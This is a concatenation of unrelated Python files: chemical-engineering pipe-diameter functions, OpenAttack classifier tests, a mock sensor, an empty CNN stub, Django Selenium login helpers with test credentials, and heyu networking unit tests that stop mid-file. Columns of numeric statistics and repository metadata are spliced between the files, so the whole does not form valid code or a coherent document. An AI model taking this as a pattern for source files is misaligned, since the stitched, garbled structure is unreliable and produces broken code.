@unitcheck(m_coolwater_dist="kg/s", rho_dist_coolwater="kg/m**3", w_liq="m/s", res_unit="m")
def d_dist_coolwater(m_coolwater_dist, rho_dist_coolwater, w_liq):
    """
    Calculates the tube's diameter of enter and out cooling water to distillate cooler.

    Parameters
    ----------
    m_coolwater_dist : float
        The mass flow rate of cooling water, [kg/s]
    rho_dist_coolwater : float
        The density of cool water, [kg/m**3]
    w_liq : float
        The speed of liquid at the tube, [m/s]

    Returns
    -------
    d_dist_coolwater : float
        The tube's diameter of enter and out cooling water to distillate cooler, [m]
    """
    # d = sqrt(G / (0.785*rho*w)); fixes tuple `0,785` and missing sqrt.
    return (m_coolwater_dist / (0.785 * rho_dist_coolwater * w_liq)) ** 0.5
@unitcheck(m_coolwater_dist="kg/s", rho_dist_coolwater="kg/m**3", d_dist_coolwater_real="m", res_unit="m/s")
def w_dist_coolwater_real(m_coolwater_dist, rho_dist_coolwater, d_dist_coolwater_real):
    """
    Calculates the real speed of liquid at the tube.

    Parameters
    ----------
    m_coolwater_dist : float
        The mass flow rate of cooling water, [kg/s]
    rho_dist_coolwater : float
        The density of cool water, [kg/m**3]
    d_dist_coolwater_real : float
        The real tube's diameter, [m]

    Returns
    -------
    w_dist_coolwater_real : float
        The real speed of liquid at the tube, [m/s]
    """
    # w = G / (0.785 * d**2 * rho); `^` -> `**`, tuple `0,785` -> 0.785.
    return m_coolwater_dist / (0.785 * d_dist_coolwater_real ** 2 * rho_dist_coolwater)
@unitcheck(m_coolwater_waste="kg/s", rho_waste_coolwater="kg/m**3", w_liq="m/s", res_unit="m")
def d_waste_coolwater(m_coolwater_waste, rho_waste_coolwater, w_liq):
    """
    Calculates the tube's diameter of enter and out cooling water to waste cooler.

    Parameters
    ----------
    m_coolwater_waste : float
        The mass flow rate of cooling water, [kg/s]
    rho_waste_coolwater : float
        The density of cool water, [kg/m**3]
    w_liq : float
        The speed of liquid at the tube, [m/s]

    Returns
    -------
    d_waste_coolwater : float
        The tube's diameter of enter and out cooling water to waste cooler, [m]
    """
    # d = sqrt(G / (0.785*rho*w)); fixes tuple `0,785` and missing sqrt.
    return (m_coolwater_waste / (0.785 * rho_waste_coolwater * w_liq)) ** 0.5
@unitcheck(m_coolwater_waste="kg/s", rho_waste_coolwater="kg/m**3", d_waste_coolwater_real="m", res_unit="m/s")
def w_waste_coolwater_real(m_coolwater_waste, rho_waste_coolwater, d_waste_coolwater_real):
    """
    Calculates the real speed of liquid at the tube.

    Parameters
    ----------
    m_coolwater_waste : float
        The mass flow rate of cooling water, [kg/s]
    rho_waste_coolwater : float
        The density of cool water, [kg/m**3]
    d_waste_coolwater_real : float
        The real tube's diameter, [m]

    Returns
    -------
    w_waste_coolwater_real : float
        The real speed of liquid at the tube, [m/s]
    """
    # w = G / (0.785 * d**2 * rho); `^` -> `**`, tuple `0,785` -> 0.785.
    return m_coolwater_waste / (0.785 * d_waste_coolwater_real ** 2 * rho_waste_coolwater)
@unitcheck(m_coolwater_deph="kg/s", rho_deph_coolwater="kg/m**3", w_liq="m/s", res_unit="m")
def d_deph_coolwater(m_coolwater_deph, rho_deph_coolwater, w_liq):
    """
    Calculates the tube's diameter of enter and out cooling water to dephlegmator.

    Parameters
    ----------
    m_coolwater_deph : float
        The mass flow rate of cooling water, [kg/s]
    rho_deph_coolwater : float
        The density of cool water, [kg/m**3]
    w_liq : float
        The speed of liquid at the tube, [m/s]

    Returns
    -------
    d_deph_coolwater : float
        The tube's diameter of enter and out cooling water to dephlegmator, [m]
    """
    # d = sqrt(G / (0.785*rho*w)); fixes tuple `0,785` and missing sqrt.
    return (m_coolwater_deph / (0.785 * rho_deph_coolwater * w_liq)) ** 0.5
@unitcheck(m_coolwater_deph="kg/s", rho_deph_coolwater="kg/m**3", d_deph_coolwater_real="m", res_unit="m/s")
def w_deph_coolwater_real(m_coolwater_deph, rho_deph_coolwater, d_deph_coolwater_real):
    """
    Calculates the real speed of liquid at the tube.

    Parameters
    ----------
    m_coolwater_deph : float
        The mass flow rate of cooling water, [kg/s]
    rho_deph_coolwater : float
        The density of cool water, [kg/m**3]
    d_deph_coolwater_real : float
        The real tube's diameter, [m]

    Returns
    -------
    w_deph_coolwater_real : float
        The real speed of liquid at the tube, [m/s]
    """
    # w = G / (0.785 * d**2 * rho); `^` -> `**`, tuple `0,785` -> 0.785.
    return m_coolwater_deph / (0.785 * d_deph_coolwater_real ** 2 * rho_deph_coolwater)
| 30.906475
| 112
| 0.63047
| 4,060
| 25,776
| 3.742118
| 0.018473
| 0.075824
| 0.018956
| 0.011848
| 0.968209
| 0.937537
| 0.887843
| 0.867636
| 0.851511
| 0.809452
| 0
| 0.013015
| 0.236926
| 25,776
| 833
| 113
| 30.943577
| 0.759418
| 0.579337
| 0
| 0
| 0
| 0
| 0.066331
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.330275
| false
| 0
| 0.009174
| 0
| 0.669725
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
d4388ae280283d39228e7ccff710d2b4b866358c
| 2,656
|
py
|
Python
|
test/test_meta_classifier.py
|
e-tornike/OpenAttack
|
b19c53af2e01f096505f8ebb8f48a54388295003
|
[
"MIT"
] | 444
|
2020-07-14T12:13:26.000Z
|
2022-03-28T02:46:30.000Z
|
test/test_meta_classifier.py
|
e-tornike/OpenAttack
|
b19c53af2e01f096505f8ebb8f48a54388295003
|
[
"MIT"
] | 50
|
2020-07-15T01:34:42.000Z
|
2022-01-24T12:19:19.000Z
|
test/test_meta_classifier.py
|
e-tornike/OpenAttack
|
b19c53af2e01f096505f8ebb8f48a54388295003
|
[
"MIT"
] | 86
|
2020-08-02T13:16:45.000Z
|
2022-03-27T06:22:04.000Z
|
import OpenAttack
import numpy as np
import unittest, os
class MetaClassifier(OpenAttack.Classifier):
    """Stub classifier that records the context input it was invoked with."""

    def __init__(self):
        # Most recently observed ``self.context.input``; None until get_grad runs.
        self.last_meta = None

    def get_pred(self, input_):
        # Predictions are delegated straight to the probability path.
        return self.get_prob(input_)

    def get_prob(self, input_):
        # Probabilities come from the gradient path; keep only the array part.
        grad, _ = self.get_grad([input_], [0])
        return grad

    def get_grad(self, input_, labels):
        # Capture whatever meta the framework put into the context,
        # then return a fixed fake gradient.
        self.last_meta = self.context.input
        fake_grad = np.array([[1, 2, 3]])
        return fake_grad, None
class TestMetaClassifier(unittest.TestCase):
    """Checks that context meta reaches MetaClassifier through every accessor."""

    def _assert_meta_plumbing(self, method_name, bad_calls, good_args):
        # Shared scenario for get_pred/get_prob/get_grad: wrong-arity or
        # wrong-type calls raise TypeError and leave the recorded meta
        # untouched; valid calls after set_context() record the meta dict.
        clsf = MetaClassifier()
        self.assertIsNone(clsf.last_meta)
        method = getattr(clsf, method_name)
        for args in bad_calls:
            with self.assertRaises(TypeError):
                method(*args)
        self.assertIsNone(clsf.last_meta)
        for meta in ({}, {"THIS": "that"}):
            clsf.set_context(meta, None)
            method(*good_args)
            self.assertDictEqual(clsf.last_meta, meta)

    def test_get_pred(self):
        self._assert_meta_plumbing(
            "get_pred",
            [("I love apples",), (), (["I love apples"], "b", "c")],
            (["I love apples"],),
        )

    def test_get_prob(self):
        self._assert_meta_plumbing(
            "get_prob",
            [("I love apples",), (), (["I love apples"], "b", "c")],
            (["I love apples"],),
        )

    def test_get_grad(self):
        self._assert_meta_plumbing(
            "get_grad",
            [("I love apples",), (), (["I love apples"],),
             (["I love apples"], "b", "c", "d")],
            ([["I", "love", "apples"]], [0]),
        )
| 36.888889
| 62
| 0.602786
| 318
| 2,656
| 4.858491
| 0.147799
| 0.072492
| 0.092557
| 0.187702
| 0.813592
| 0.783819
| 0.783819
| 0.773463
| 0.773463
| 0.726861
| 0
| 0.003532
| 0.253765
| 2,656
| 72
| 63
| 36.888889
| 0.775984
| 0
| 0
| 0.578125
| 0
| 0
| 0.0828
| 0
| 0
| 0
| 0
| 0
| 0.34375
| 1
| 0.109375
| false
| 0
| 0.046875
| 0.03125
| 0.234375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d46bb22621ea36a7a468068e1f54e396c9d63f24
| 40
|
py
|
Python
|
src/sensors/mock.py
|
space-santa/py-tts
|
e777c97492fdff019e520c39dc27c2eaca38b559
|
[
"Apache-2.0"
] | null | null | null |
src/sensors/mock.py
|
space-santa/py-tts
|
e777c97492fdff019e520c39dc27c2eaca38b559
|
[
"Apache-2.0"
] | null | null | null |
src/sensors/mock.py
|
space-santa/py-tts
|
e777c97492fdff019e520c39dc27c2eaca38b559
|
[
"Apache-2.0"
] | null | null | null |
def get_temperature():
    """Return a fixed mock temperature reading."""
    mock_reading = 12.34
    return mock_reading
| 13.333333
| 22
| 0.7
| 6
| 40
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 0.2
| 40
| 2
| 23
| 20
| 0.71875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
00fe8417a234741b8a7c687aa863f8464202f3a4
| 148
|
py
|
Python
|
AI/day03/VCAI/submit/conv2d.py
|
Ersikan/Pool2021
|
cc64658039dee04127a3a641f891781c53647244
|
[
"MIT"
] | 16
|
2021-03-09T10:25:18.000Z
|
2022-02-08T14:29:24.000Z
|
AI/day03/VCAI/submit/conv2d.py
|
Ersikan/Pool2021
|
cc64658039dee04127a3a641f891781c53647244
|
[
"MIT"
] | null | null | null |
AI/day03/VCAI/submit/conv2d.py
|
Ersikan/Pool2021
|
cc64658039dee04127a3a641f891781c53647244
|
[
"MIT"
] | 3
|
2021-02-10T09:32:21.000Z
|
2022-02-01T17:07:59.000Z
|
import numpy
import torch
import torch.nn as nn
import torch.nn.functional as F
import matplotlib.pyplot as plt
# TODO: Create your CNN model here
| 18.5
| 34
| 0.797297
| 26
| 148
| 4.538462
| 0.615385
| 0.279661
| 0.220339
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162162
| 148
| 7
| 35
| 21.142857
| 0.951613
| 0.216216
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2e41059737f4d221e7f02145402803f82b9e1f7c
| 2,196
|
py
|
Python
|
tests/MyFuncLogin.py
|
mribrgr/StuRa-Mitgliederdatenbank
|
87a261d66c279ff86056e315b05e6966b79df9fa
|
[
"MIT"
] | 8
|
2019-11-26T13:34:46.000Z
|
2021-06-21T13:41:57.000Z
|
src/tests/MyFuncLogin.py
|
Sumarbrander/Stura-Mitgliederdatenbank
|
691dbd33683b2c2d408efe7a3eb28e083ebcd62a
|
[
"MIT"
] | 93
|
2019-12-16T09:29:10.000Z
|
2021-04-24T12:03:33.000Z
|
src/tests/MyFuncLogin.py
|
Sumarbrander/Stura-Mitgliederdatenbank
|
691dbd33683b2c2d408efe7a3eb28e083ebcd62a
|
[
"MIT"
] | 2
|
2020-12-03T12:43:19.000Z
|
2020-12-22T21:48:47.000Z
|
from django.urls import reverse
def loginAsLukasAdmin(self):
    """
    Opens a Browser instance and login as admin with the account testlukasadmin.

    :param self: the live-server test case; provides ``browser`` (a Selenium
        WebDriver, judging by find_element_by_id) and ``live_server_url``
    :type self:
    :return: No return Value
    """
    # Open the browser on the live server's login page.
    # NOTE(review): except BaseException only prints and continues — if the
    # page fails to open, the element lookups below will still run. Confirm
    # this best-effort behavior is intended.
    try:
        self.browser.get(self.live_server_url)
    except BaseException:
        print('Error in opening login page')
    # Look up all required elements of the login page.
    # NOTE(review): if this lookup fails, entUsername/entPassword/btnLogin
    # stay unbound and the send_keys calls below raise NameError.
    try:
        entUsername = self.browser.find_element_by_id('id_username')
        entPassword = self.browser.find_element_by_id('id_password')
        btnLogin = self.browser.find_element_by_id('btn-login')
    except BaseException:
        print("Es wurden nicht alle Objekte auf der Seite gefunden")
    # Enter the login credentials and submit.
    entUsername.send_keys('testlukasadmin')
    entPassword.send_keys('0123456789test')
    btnLogin.click()
    # Check Login Success: the browser must have been redirected to the
    # members homepage (URL resolved via Django's reverse()).
    self.assertEqual(
        self.browser.current_url,
        self.live_server_url +
        reverse('mitglieder:homepage'),
        msg="Konnte nicht angemeldet werden bzw. Weiterleitung nicht erfolgt")
    pass
def loginAsLukasUser(self):
    """
    Opens a Browser instance and login as user with the account testlukas.

    :param self: the live-server test case; provides ``browser`` (a Selenium
        WebDriver, judging by find_element_by_id) and ``live_server_url``
    :type self:
    :return: No return Value
    """
    # Open the browser on the live server's login page.
    # NOTE(review): except BaseException only prints and continues — if the
    # page fails to open, the element lookups below will still run. Confirm
    # this best-effort behavior is intended.
    try:
        self.browser.get(self.live_server_url)
    except BaseException:
        print('Error in opening login page')
    # Look up all required elements of the login page.
    # NOTE(review): if this lookup fails, entUsername/entPassword/btnLogin
    # stay unbound and the send_keys calls below raise NameError.
    try:
        entUsername = self.browser.find_element_by_id('id_username')
        entPassword = self.browser.find_element_by_id('id_password')
        btnLogin = self.browser.find_element_by_id('btn-login')
    except BaseException:
        print("Es wurden nicht alle Objekte auf der Seite gefunden")
    # Enter the login credentials and submit.
    entUsername.send_keys('testlukas')
    entPassword.send_keys('0123456789test')
    btnLogin.click()
    # Check Login Success: the browser must have been redirected to the
    # members homepage (URL resolved via Django's reverse()).
    self.assertEqual(
        self.browser.current_url,
        self.live_server_url +
        reverse('mitglieder:homepage'),
        msg="Konnte nicht angemeldet werden bzw. Weiterleitung nicht erfolgt")
    pass
| 28.894737
| 84
| 0.670765
| 259
| 2,196
| 5.548263
| 0.324324
| 0.076548
| 0.06263
| 0.091858
| 0.896312
| 0.896312
| 0.896312
| 0.896312
| 0.847599
| 0.847599
| 0
| 0.012077
| 0.245902
| 2,196
| 75
| 85
| 29.28
| 0.855676
| 0.201275
| 0
| 0.878049
| 0
| 0
| 0.260843
| 0
| 0
| 0
| 0
| 0
| 0.04878
| 1
| 0.04878
| false
| 0.146341
| 0.02439
| 0
| 0.073171
| 0.097561
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
2e5772bada569ca89a06823c22e98d5f3a62822b
| 25,929
|
py
|
Python
|
tests/unit/test_util.py
|
klmitch/heyu
|
9bdc552115bb22d1d01910b0b851eb3cbc3b08d1
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_util.py
|
klmitch/heyu
|
9bdc552115bb22d1d01910b0b851eb3cbc3b08d1
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_util.py
|
klmitch/heyu
|
9bdc552115bb22d1d01910b0b851eb3cbc3b08d1
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 Rackspace
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ConfigParser
import io
import os
import socket
import unittest
from gevent import ssl
import mock
from heyu import util
class TestException(Exception):
    """Distinct exception type raised deliberately by these tests."""
class ParseHubTest(unittest.TestCase):
    """Tests for util.parse_hub().

    parse_hub() takes a "host", "host:port", "[ipv6]" or "[ipv6]:port"
    string and resolves it via socket.getaddrinfo(); getaddrinfo is
    mocked throughout, so no test ever touches the network.
    """

    @mock.patch.object(socket, 'getaddrinfo',
                       side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
    def test_space(self, mock_getaddrinfo):
        # Whitespace in the hostname is rejected before any resolution.
        self.assertRaises(util.HubException, util.parse_hub, 'bad hostname')
        self.assertFalse(mock_getaddrinfo.called)

    @mock.patch.object(socket, 'getaddrinfo',
                       side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
    def test_bracket(self, mock_getaddrinfo):
        # Stray or empty brackets are rejected before any resolution.
        self.assertRaises(util.HubException, util.parse_hub, 'bad[hostname')
        self.assertRaises(util.HubException, util.parse_hub, 'bad]hostname')
        self.assertRaises(util.HubException, util.parse_hub, '[]')
        self.assertFalse(mock_getaddrinfo.called)

    @mock.patch.object(socket, 'getaddrinfo',
                       side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
    def test_colon(self, mock_getaddrinfo):
        # A non-numeric or missing port after ':' is rejected.
        self.assertRaises(util.HubException, util.parse_hub, 'bad:hostname')
        self.assertRaises(util.HubException, util.parse_hub, 'bad:')
        self.assertFalse(mock_getaddrinfo.called)

    @mock.patch.object(socket, 'getaddrinfo',
                       side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
    def test_bad_ipv6(self, mock_getaddrinfo):
        # IPv6 literals must be fully bracketed, i.e. "[::1]".
        self.assertRaises(util.HubException, util.parse_hub, '::1')
        self.assertRaises(util.HubException, util.parse_hub, '[::1')
        self.assertRaises(util.HubException, util.parse_hub, '::1]')
        self.assertFalse(mock_getaddrinfo.called)

    @mock.patch.object(socket, 'getaddrinfo',
                       side_effect=socket.gaierror(-2, 'Name or service '
                                                   'not known'))
    def test_unresolvable(self, mock_getaddrinfo):
        # A getaddrinfo failure is converted into a HubException.
        self.assertRaises(util.HubException, util.parse_hub, 'hostname')
        mock_getaddrinfo.assert_called_once_with(
            'hostname', util.HEYU_PORT, 0, socket.SOCK_STREAM)

    @mock.patch.object(socket, 'getaddrinfo',
                       side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
    def test_bare_hostname(self, mock_getaddrinfo):
        # A bare hostname gets the default HEYU_PORT.
        result = util.parse_hub('hostname')
        self.assertEqual(('hostname', util.HEYU_PORT), result)
        mock_getaddrinfo.assert_called_once_with(
            'hostname', util.HEYU_PORT, 0, socket.SOCK_STREAM)

    @mock.patch.object(socket, 'getaddrinfo',
                       side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
    def test_hostname_with_port(self, mock_getaddrinfo):
        # An explicit ":port" overrides the default port.
        result = util.parse_hub('hostname:1234')
        self.assertEqual(('hostname', 1234), result)
        mock_getaddrinfo.assert_called_once_with(
            'hostname', 1234, 0, socket.SOCK_STREAM)

    @mock.patch.object(socket, 'getaddrinfo',
                       side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
    def test_bare_ipv4(self, mock_getaddrinfo):
        # An IPv4 literal works like a hostname, default port applied.
        result = util.parse_hub('127.0.0.1')
        self.assertEqual(('127.0.0.1', util.HEYU_PORT), result)
        mock_getaddrinfo.assert_called_once_with(
            '127.0.0.1', util.HEYU_PORT, 0, socket.SOCK_STREAM)

    @mock.patch.object(socket, 'getaddrinfo',
                       side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
    def test_ipv4_with_port(self, mock_getaddrinfo):
        # IPv4 literal with an explicit port.
        result = util.parse_hub('127.0.0.1:1234')
        self.assertEqual(('127.0.0.1', 1234), result)
        mock_getaddrinfo.assert_called_once_with(
            '127.0.0.1', 1234, 0, socket.SOCK_STREAM)

    @mock.patch.object(socket, 'getaddrinfo',
                       side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
    def test_bare_ipv6(self, mock_getaddrinfo):
        # A bracketed IPv6 literal; brackets are stripped from the result.
        result = util.parse_hub('[::1]')
        self.assertEqual(('::1', util.HEYU_PORT), result)
        mock_getaddrinfo.assert_called_once_with(
            '::1', util.HEYU_PORT, 0, socket.SOCK_STREAM)

    @mock.patch.object(socket, 'getaddrinfo',
                       side_effect=lambda a, b, c, d: [(1, 2, 3, '', (a, b))])
    def test_ipv6_with_port(self, mock_getaddrinfo):
        # Bracketed IPv6 literal with an explicit port.
        result = util.parse_hub('[::1]:1234')
        self.assertEqual(('::1', 1234), result)
        mock_getaddrinfo.assert_called_once_with(
            '::1', 1234, 0, socket.SOCK_STREAM)
class DefaultHubTest(unittest.TestCase):
    """Tests for util.default_hub(), which reads ~/.heyu.hub and falls
    back to localhost on the default port when it cannot."""

    @mock.patch('os.path.expanduser', return_value='/home/user/.heyu.hub')
    @mock.patch('__builtin__.open', side_effect=IOError())
    @mock.patch.object(util, 'parse_hub', return_value=('1.2.3.4', 1234))
    def test_no_hub_file(self, parse_hub_mock, open_mock, expanduser_mock):
        # The hub file cannot be opened: fall back to localhost.
        hub = util.default_hub()

        open_mock.assert_called_once_with('/home/user/.heyu.hub')
        self.assertFalse(parse_hub_mock.called)
        self.assertEqual(hub, ('127.0.0.1', util.HEYU_PORT))

    @mock.patch('os.path.expanduser', return_value='/home/user/.heyu.hub')
    @mock.patch('__builtin__.open', return_value=io.BytesIO('hub\n'))
    @mock.patch.object(util, 'parse_hub', side_effect=util.HubException())
    def test_no_hub_resolv(self, parse_hub_mock, open_mock, expanduser_mock):
        # The file's contents do not parse: fall back to localhost.
        hub = util.default_hub()

        open_mock.assert_called_once_with('/home/user/.heyu.hub')
        parse_hub_mock.assert_called_once_with('hub')
        self.assertEqual(hub, ('127.0.0.1', util.HEYU_PORT))

    @mock.patch('os.path.expanduser', return_value='/home/user/.heyu.hub')
    @mock.patch('__builtin__.open', return_value=io.BytesIO('hub\n'))
    @mock.patch.object(util, 'parse_hub', return_value=('1.2.3.4', 1234))
    def test_default_hub(self, parse_hub_mock, open_mock, expanduser_mock):
        # Happy path: the parsed hub address from the file is returned.
        hub = util.default_hub()

        open_mock.assert_called_once_with('/home/user/.heyu.hub')
        parse_hub_mock.assert_called_once_with('hub')
        self.assertEqual(hub, ('1.2.3.4', 1234))
class OutgoingEndpointTest(unittest.TestCase):
    """Tests for util.outgoing_endpoint(), which picks a wildcard bind
    address matching the target's address family."""

    @mock.patch('tendril.addr_info', return_value=socket.AF_INET)
    def test_ipv4(self, addr_info_mock):
        # An IPv4 target binds to the IPv4 wildcard with an ephemeral port.
        endpoint = util.outgoing_endpoint('target')

        addr_info_mock.assert_called_once_with('target')
        self.assertEqual(endpoint, ('', 0))

    @mock.patch('tendril.addr_info', return_value=socket.AF_INET6)
    def test_ipv6(self, addr_info_mock):
        # An IPv6 target binds to the IPv6 wildcard with an ephemeral port.
        endpoint = util.outgoing_endpoint('target')

        addr_info_mock.assert_called_once_with('target')
        self.assertEqual(endpoint, ('::', 0))
class CertWrapperTest(unittest.TestCase):
    """Tests for util.cert_wrapper().

    cert_wrapper() reads an ini-style certificate configuration
    (default ~/.heyu.cert, selectable as "path[profile]") and builds an
    ssl.wrap_socket wrapper via tendril.TendrilPartial.  The config
    parser and TendrilPartial are mocked throughout.
    """

    @mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
    @mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
        'read.return_value': [],
        'items.return_value': [],
    }))
    @mock.patch('tendril.TendrilPartial', return_value='wrapper')
    def test_insecure(self, mock_TendrilPartial, mock_SafeConfigParser,
                      mock_expanduser):
        # secure=False short-circuits: no config read, no wrapper built.
        result = util.cert_wrapper(None, 'test', secure=False)
        self.assertEqual(None, result)
        self.assertFalse(mock_expanduser.called)
        self.assertFalse(mock_SafeConfigParser.called)
        self.assertFalse(mock_TendrilPartial.called)

    @mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
    @mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
        'read.return_value': [],
        'items.return_value': [],
    }))
    @mock.patch('tendril.TendrilPartial', return_value='wrapper')
    def test_missing_conf(self, mock_TendrilPartial, mock_SafeConfigParser,
                          mock_expanduser):
        # read() returning an empty list means the file did not exist.
        cp = mock_SafeConfigParser.return_value
        self.assertRaises(util.CertException, util.cert_wrapper, None, 'test')
        mock_expanduser.assert_called_once_with('~/.heyu.cert')
        mock_SafeConfigParser.assert_called_once_with()
        cp.read.assert_called_once_with('/home/dir/.heyu.cert')
        self.assertFalse(cp.items.called)
        self.assertFalse(mock_TendrilPartial.called)

    @mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
    @mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
        'read.return_value': [],
        'items.return_value': [],
    }))
    @mock.patch('tendril.TendrilPartial', return_value='wrapper')
    def test_bad_conf(self, mock_TendrilPartial, mock_SafeConfigParser,
                      mock_expanduser):
        # An unbalanced "path[profile" spec is rejected before any I/O.
        cp = mock_SafeConfigParser.return_value
        self.assertRaises(util.CertException, util.cert_wrapper,
                          'bad[file', 'test')
        self.assertFalse(mock_expanduser.called)
        self.assertFalse(mock_SafeConfigParser.called)
        self.assertFalse(cp.items.called)
        self.assertFalse(mock_TendrilPartial.called)

    @mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
    @mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
        'read.return_value': ['/home/dir/.heyu.cert'],
        'items.side_effect': ConfigParser.NoSectionError('test'),
    }))
    @mock.patch('tendril.TendrilPartial', return_value='wrapper')
    def test_missing_profile(self, mock_TendrilPartial, mock_SafeConfigParser,
                             mock_expanduser):
        # Missing [test] section in the config is a CertException.
        cp = mock_SafeConfigParser.return_value
        self.assertRaises(util.CertException, util.cert_wrapper, None, 'test')
        mock_expanduser.assert_called_once_with('~/.heyu.cert')
        mock_SafeConfigParser.assert_called_once_with()
        cp.read.assert_called_once_with('/home/dir/.heyu.cert')
        cp.items.assert_called_once_with('test')
        self.assertFalse(mock_TendrilPartial.called)

    @mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
    @mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
        'read.return_value': ['/home/dir/.heyu.cert'],
        'items.side_effect': TestException('test'),
    }))
    @mock.patch('tendril.TendrilPartial', return_value='wrapper')
    def test_unloadable_profile(self, mock_TendrilPartial,
                                mock_SafeConfigParser, mock_expanduser):
        # Any other error while reading the profile also becomes a
        # CertException rather than propagating.
        cp = mock_SafeConfigParser.return_value
        self.assertRaises(util.CertException, util.cert_wrapper, None, 'test')
        mock_expanduser.assert_called_once_with('~/.heyu.cert')
        mock_SafeConfigParser.assert_called_once_with()
        cp.read.assert_called_once_with('/home/dir/.heyu.cert')
        cp.items.assert_called_once_with('test')
        self.assertFalse(mock_TendrilPartial.called)

    @mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
    @mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
        'read.return_value': ['/home/dir/.heyu.cert'],
        'items.return_value': [('cafile', 'ca'), ('certfile', 'cert')],
    }))
    @mock.patch('tendril.TendrilPartial', return_value='wrapper')
    def test_missing_keyfile(self, mock_TendrilPartial, mock_SafeConfigParser,
                             mock_expanduser):
        # All of keyfile/certfile/cafile are mandatory; keyfile absent.
        cp = mock_SafeConfigParser.return_value
        self.assertRaises(util.CertException, util.cert_wrapper, None, 'test')
        mock_expanduser.assert_called_once_with('~/.heyu.cert')
        mock_SafeConfigParser.assert_called_once_with()
        cp.read.assert_called_once_with('/home/dir/.heyu.cert')
        cp.items.assert_called_once_with('test')
        self.assertFalse(mock_TendrilPartial.called)

    @mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
    @mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
        'read.return_value': ['/home/dir/.heyu.cert'],
        'items.return_value': [('keyfile', 'key'), ('certfile', 'cert')],
    }))
    @mock.patch('tendril.TendrilPartial', return_value='wrapper')
    def test_missing_cafile(self, mock_TendrilPartial, mock_SafeConfigParser,
                            mock_expanduser):
        # cafile absent from the profile.
        cp = mock_SafeConfigParser.return_value
        self.assertRaises(util.CertException, util.cert_wrapper, None, 'test')
        mock_expanduser.assert_called_once_with('~/.heyu.cert')
        mock_SafeConfigParser.assert_called_once_with()
        cp.read.assert_called_once_with('/home/dir/.heyu.cert')
        cp.items.assert_called_once_with('test')
        self.assertFalse(mock_TendrilPartial.called)

    @mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
    @mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
        'read.return_value': ['/home/dir/.heyu.cert'],
        'items.return_value': [('cafile', 'ca'), ('keyfile', 'key')],
    }))
    @mock.patch('tendril.TendrilPartial', return_value='wrapper')
